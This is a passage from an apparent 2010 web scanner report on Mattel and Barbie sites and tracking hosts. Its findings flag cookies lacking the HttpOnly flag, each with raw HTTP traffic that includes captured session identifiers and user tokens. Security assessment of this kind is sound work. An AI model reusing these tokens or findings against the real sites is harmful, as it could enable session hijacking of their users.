Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:17 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/home/index.jsp?sr=1
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=nNbLNSJRqVrxQdwRHw36YXlWtdsyz19pHJvCJ9Nvs8BXjClZGT1Q!-1434729825; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:30:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 279

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/home/index.
...[SNIP]...

4.11. https://shop.mattel.com/shop/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:09 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/shop/index.jsp
Set-Cookie: JSESSIONID=3TH2NSJJTJj8m1BvPfFTBxtL3MKxHh419LByYsPnhhJ5gPWKVpSR!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/shop/index.
...[SNIP]...

4.12. https://shop.mattel.com/storeLocator/index.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storeLocator/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=vR51NSJGT4MQyLVFJyxv053tGlfQRVQKCq4gRLT2H1XhFhRhzJRJ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41070


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...

4.13. http://tracking.searchmarketing.com/gsic_welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /gsic_welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gsic_welcome.asp?SMCID=1983&x=http%3A//www.barbie.com/videogirl/ HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SM=GUID=3cf273a3%2D1e33%2D4fb3%2Db7d3%2Df656fd5ae794&AID=&LastVisitDate=12%2F15%2F2010+5%3A42%3A12+PM&SMCID=2066

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQDAABCA=KMEDNHEBKHLACOOPCOCPKBFK; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

4.14. http://videogirlcontest.barbie.com/display_page

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videogirlcontest.barbie.com
Path:   /display_page

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display_page?page=gallery HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.2.10.1293083893

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Wed, 22 Dec 2010 23:59:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 22 Dec 2010 23:59:35 GMT
Connection: close
Set-Cookie: session=4d1290e773c604af; path=/; expires=Thu, 23-Dec-2010 00:29:35 GMT
Content-Length: 6508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Barbi
...[SNIP]...

4.15. http://videogirlcontest.barbie.com/get_contest_entries

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videogirlcontest.barbie.com
Path:   /get_contest_entries

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /get_contest_entries HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893
Content-Length: 121

xml=1&count=5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=3&page=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 2013
Content-Type: text/xml; charset=utf-8
Cache-Control: public, max-age=300
Expires: Thu, 23 Dec 2010 00:04:37 GMT
Date: Wed, 22 Dec 2010 23:59:37 GMT
Connection: close
Set-Cookie: session=4d1290e9056bf834; path=/; expires=Thu, 23-Dec-2010 00:29:37 GMT

<?xml version="1.0" encoding="UTF-8" ?>

<gallery cid="p1core-tbx09.f.1800/af61f/6f1/e3e0e165.d273297883881bf94d107a8fb5d498d8">

<categories>
<item data="" label="All Categories" sele
...[SNIP]...

4.16. http://videogirlcontest.barbie.com/get_entry

Summary

Severity:   Low
Confidence:   Firm
Host:   http://videogirlcontest.barbie.com
Path:   /get_entry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /get_entry?id=38;format=thumb HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://akamai.eprizecdn.net/mattel/barbie/live/27880E68-ED1A-11DF-88F2-44242484E103_0000.png
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 22 Dec 2010 23:59:37 GMT
Content-Length: 0
Content-Type: image/png
Date: Wed, 22 Dec 2010 23:59:37 GMT
Connection: close
Set-Cookie: session=4d1290e9ed7fa8ae; path=/; expires=Thu, 23-Dec-2010 00:29:37 GMT


4.17. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035471&rn=1820125381&c7=http%3A%2F%2Fwww.barbie.com%2Fvideogirl%2F&c4=http%3A%2F%2Fwww.barbie.com%2Fvideogirl%2F&c8=Video%20Girl%20-%20Home%20-%20Barbie.com&c9=http%3A%2F%2Fvideogirlcontest.barbie.com%2Fpublic%2Fmedia%2FBarbieGalleryVote_safe.swf&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cb1dc5-204.0.5.41-1286583196

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 23 Dec 2010 00:01:10 GMT
Connection: close
Set-Cookie: UID=cb1dc5-204.0.5.41-1286583196; expires=Sat, 22-Dec-2012 00:01:10 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


4.18. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=2287&browse_products=4199678 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1293062958_1293062958683:9494125139666732; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1293062958; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 23 Dec 2010 00:09:18 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

4.19. http://shop.mattel.com/category/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /category/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:28:45 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35853


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...

4.20. http://shop.mattel.com/family/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /family/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:30 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:37 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36842


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...

4.21. http://shop.mattel.com/history/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /history/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /history/index.jsp?ruvClear=yes HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/home/index.jsp
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e1804; expires=Tuesday, 10-Jan-2079 03:29:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/home/index.
...[SNIP]...

4.22. http://shop.mattel.com/product/wishlist/wishlist.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /product/wishlist/wishlist.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:12:29 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/coreg/index.jsp?step=register
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:36 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 299

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/coreg/index
...[SNIP]...

4.23. http://shop.mattel.com/search/controller.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /search/controller.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Cache-Control: max-age=0
Origin: http://shop.mattel.com
Content-Type: application/x-www-form-urlencoded
